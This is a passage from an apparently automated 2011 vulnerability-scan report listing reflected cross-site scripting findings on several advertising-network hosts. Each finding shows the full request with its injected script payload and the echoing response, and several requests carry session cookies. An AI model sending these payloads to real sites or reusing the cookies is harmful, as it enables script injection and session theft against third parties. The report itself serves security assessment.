document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x9069369'-alert(1)-'a8318c35dc5&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066&redir=http%3A%2F%2Fad.yieldma
...[SNIP]...

4.52. http://adnxs.revsci.net/imp [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7888'-alert(1)-'4414a9728dd was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=748066a7888'-alert(1)-'4414a9728dd&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:21:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:21:15 GMT
Content-Length: 864

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066a7888'-alert(1)-'4414a9728dd&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D748066a7888%27-alert%281%29-%274414a9728dd%26r%3D1%26_salt%3D1188639314%26u%3Dhttp%253A%2
...[SNIP]...

4.53. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 99034<script>alert(1)</script>23c6ef95413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269799034<script>alert(1)</script>23c6ef95413?d=4325897289836481830 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MlCqBQA%3D"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; rb2=Ch0KBjcxMjE1Nhij2_fAGiINMXZvb2Z5NmEwdGsxdwo4CgY3MTIxODEY5Lqa4BYiKFdIOXFZbGQyUW5KQURXMWRCd1Y0VkFaVWFYc1FkUUpDRFY5aVgxcFAKIwoGNzQyNjk3GOilqtsWIhM0MzI1ODk3Mjg5ODM2NDgxODMwCiQKBjc1MzI5MhjXvfa6FyIUQUctMDAwMDAwMDEzODkzNTg1NTQKNAoGODA2MjA1GOihjekdIiQ5ZWQzZjJmMi03ZjVhLTExZTAtYTA3YS0wMDI1OTAwOWE5ZTQQAQ; ut="1%3AVZDLkoMgEEX%2FhbULQGU0f6OiQWMjDxOiIf8%2B2qRSM9tT9%2FStvi%2Fy4OTyIrd%2BC4uTnlyIvU%2Bhjsx3JbSRRZp5ZmsRmQvQOwTWyh2ORGGYQeDCDCsm7kNK1MuzOkArpyUl9NBtCGb%2BVeypaJanlgo2eYDG5AkY362n4q7rDUGnZjFuotAHnFXVfLUGNRrS4d3ZQ%2FP0R%2BiPpqqrpcqcbeNe%2FoPLX%2Bggt3A2KuCxiH7IfGkWjIC2qU5MEx4CxT%2F9gwAEdXrdD3YuEcg0js%2FpE%2BfTHB8jGWkbrXs34tzk%2Ff4F"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 13 Jun 2011 11:17:25 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269799034<script>alert(1)</script>23c6ef95413

4.54. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50807"><script>alert(1)</script>ead8b635e1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1921978&50807"><script>alert(1)</script>ead8b635e1b=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:38 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:38 GMT
Pragma: no-cache
Content-Length: 4715
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ads.bluelithium.com/imageclick?50807"><script>alert(1)</script>ead8b635e1b=1&Z=1x1&s=1921978&_salt=3940171247&t=2" target="_parent">
...[SNIP]...

4.55. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea43f"-alert(1)-"b606499e7cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1921978&ea43f"-alert(1)-"b606499e7cb=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:39 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 11:02:39 GMT
Pragma: no-cache
Content-Length: 4670
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?Z=1x1&ea43f"-alert(1)-"b606499e7cb=1&s=1921978&_salt=2707350494";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.56. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 4bd29<script>alert(1)</script>872b14ba594 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1290669&pid=7557724bd29<script>alert(1)</script>872b14ba594&ps=-1&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2537


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "7557724bd29<script>alert(1)</script>872b14ba594"

   
                                                           </head>
...[SNIP]...

4.57. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2af77--><script>alert(1)</script>56fc6852dbc was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=12906692af77--><script>alert(1)</script>56fc6852dbc&pid=755772&ps=-1&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:16 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3328
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "12906692af77--><script>alert(1)</script>56fc6852dbc" -->
...[SNIP]...

4.58. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 9d380--><script>alert(1)</script>6eeac4dc4ff was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1290669&pid=755772&ps=-19d380--><script>alert(1)</script>6eeac4dc4ff&zw=600&zh=240&url=http%3A//tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/&v=5&dct=Review%20of%20Game%20of%20Thrones%2C%20Baelor%20-%20Tuned%20In%20-%20TIME.com&metakw=uncategorized,game%20of%20thrones HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16t51ko094k0ku; TData=99999%7C51134%7C56282%7C61674%7C57094%7C60740%7C56297%7C57130%7C57129%7C61576%7C51184%7C53380%7C60489%7C60515%7C52615%7C57289%7C52946%7C53656%7C55401%7C50507%7C50557%7C54255%7C53778%7C51182%7C54252%7C50961%7C54209%7C56988%7C57372%7C56780%7C56232%7C56142%7C56768%7C56761%7C56681%7C56153_Mon%2C%2006%20Jun%202011%2015%3A43%3A48%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3767
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-19d380--><script>alert(1)</script>6eeac4dc4ff" -->
   
...[SNIP]...

4.59. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b021f'%3balert(1)//747c2682e5c was submitted in the admeld_adprovider_id parameter. This input was echoed as b021f';alert(1)//747c2682e5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567b021f'%3balert(1)//747c2682e5c&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:21:21 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 198

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567b021f';alert(1)//747c2682e5c&external_user_id=1461734246|1305465412|8|2&expiration=1310556081"/>');

4.60. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b39da'%3balert(1)//140d16c61eb was submitted in the admeld_callback parameter. This input was echoed as b39da';alert(1)//140d16c61eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchb39da'%3balert(1)//140d16c61eb HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmid=20772879917; ueid=1461734246|1305465412|8|2; lpnid=3000003

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 13 Jun 2011 11:21:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 198

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchb39da';alert(1)//140d16c61eb?admeld_adprovider_id=567&external_user_id=1461734246|1305465412|8|2&expiration=1310556082"/>');

4.61. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 910f3<script>alert(1)</script>239728372ad was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a27910f3<script>alert(1)</script>239728372ad HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=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

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:26:06 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (bbe168f7d7bf46369bbe29684c749a27910f3<script>alert(1)</script>239728372ad)

4.62. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 9ef78<script>alert(1)</script>834499b1128 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=9ef78<script>alert(1)</script>834499b1128&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3KZNYajTv8WFExkNK7HUtFp4B4dlWpgdjompglDEY6Fz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvaVisNuwTZJ71H7ipM0dUEU19JRFsRyXovJE93rVCVYWJZWr1XIQIIGVSLisisBipGPv3ipBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:26:03 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 9ef78<script>alert(1)</script>834499b1128

4.63. http://api.dimestore.com/viapi [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.dimestore.com
Path:   /viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload fca9f<a>6d3fd3426f0 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=a51773776fca9f<a>6d3fd3426f0 HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MSR/iview/313679802/direct;wi.160;hi.600/01/6942356?click=http://n4403ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/h%3B240399958%3B0-0%3B0%3B39168450%3B2321-160/600%3B41978481/41996268/1%3B%3B%7Eokv%3D%3Bsect%3Dros%3Bsz%3D160x600%3Btile%3D4%3B%7Eaopt%3D2/1/83/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 13 Jun 2011 11:23:33 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_a51773776fca9f<a>6d3fd3426f0=1; Expires=Tue, 12-Jun-2012 11:23:33 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- a51773776fca9f<a>6d3fd3426f0

4.64. http://api.mixpanel.com/track/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.mixpanel.com
Path:   /track/

Issue detail

